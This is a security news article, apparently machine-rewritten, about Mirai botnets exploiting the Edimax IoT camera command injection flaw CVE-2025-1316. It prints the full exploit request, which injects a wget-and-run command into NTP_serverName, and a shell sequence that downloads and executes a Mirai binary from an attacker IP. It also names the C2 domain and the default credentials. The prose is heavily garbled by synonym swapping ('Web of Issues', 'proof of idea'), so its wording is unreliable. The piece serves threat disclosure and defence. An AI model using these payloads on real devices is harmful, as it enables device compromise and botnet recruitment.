A latest alert from the Akamai Safety Intelligence and Response Group (SIRT) has highlighted the exploitation of a extreme command injection vulnerability in Edimax Web of Issues (IoT) gadgets.
This vulnerability, designated as CVE-2025-1316, has been actively utilized by a number of botnets to unfold Mirai malware.
Mirai is infamous for compromising IoT gadgets and orchestrating distributed denial-of-service (DDoS) assaults.
Vulnerability Overview
The CVE-2025-1316 vulnerability targets the /camera-cgi/admin/param.cgi endpoint in Edimax gadgets, permitting attackers to inject instructions into the NTP_serverName choice throughout the ipcamSource parameter.
For profitable exploitation, default credentials reminiscent of admin:1234 are used. Though the CVE particularly mentions Edimax’s IC-7100 community digicam, the vulnerability possible impacts a broader vary of Edimax gadgets.
Akamai SIRT first detected exercise concentrating on this vulnerability of their honeypots in early October 2024.
Nevertheless, the proof of idea (PoC) exploit dates again to June 2023. The earliest exploit makes an attempt noticed had been in Could 2024, with spikes in September 2024 and January-February 2025.
These assaults had been attributed to totally different botnets, together with Mirai variants.
Instance Exploit Code
The exploit injects instructions to execute a shell script on the machine. Right here’s an instance of the request payload:
/camera-cgi/admin/param.cgi motion=replace&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0This script downloads and executes a Mirai malware variant for various architectures, reminiscent of ARM, MIPS, and x86.
Malware Execution Instructions
As soon as downloaded, the malware is executed by means of instructions like:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://193.143.1[.]118/x86;
curl -O http://193.143.1[.]118/x86;
cat x86 > OSGt;
chmod +x *;
./OSGt joined;
rm -rf OSGtRelated instructions are used for different architectures like MIPS and ARM.
Mirai Botnets
Two distinct botnets have been recognized exploiting this vulnerability:
- First Botnet: This botnet makes use of the exploit to obtain and execute a curl.sh script. It communicates with the command and management (C2) server by way of angela.spklove[.]com over port 3093. The malware prints “VagneRHere” upon execution.
- Second Botnet: This botnet downloads and runs a wget.sh script, which executes Mirai malware. The malware contains antidebugging capabilities and prints “Hey, World!” upon execution.
Each botnets exploit a number of identified vulnerabilities, together with a Docker API exploit and CVE-2024-7214 affecting TOTOLINK gadgets.
Mitigation and Suggestions
To guard towards these threats:
- Improve Gadgets: Substitute outdated or susceptible gadgets with newer fashions.
- Change Default Credentials: Guarantee all gadgets use sturdy, distinctive passwords.
- Monitor Networks: Look ahead to suspicious exercise, reminiscent of uncommon site visitors patterns.
- Implement Safety Measures: Use firewalls and intrusion detection methods to dam exploit makes an attempt.
Because the legacy of Mirai malware continues to impression IoT safety, staying knowledgeable and proactive is essential for safeguarding these gadgets.
The continuing exploitation of Edimax IoT gadgets highlights the persistent dangers related to legacy firmware and the pervasive risk of Mirai malware.
Common monitoring and proactive safety methods are important in defending towards evolving cyber threats.
Are you from SOC/DFIR Groups? – Analyse Malware Incidents & get stay Entry with ANY.RUN -> Begin Now for Free.
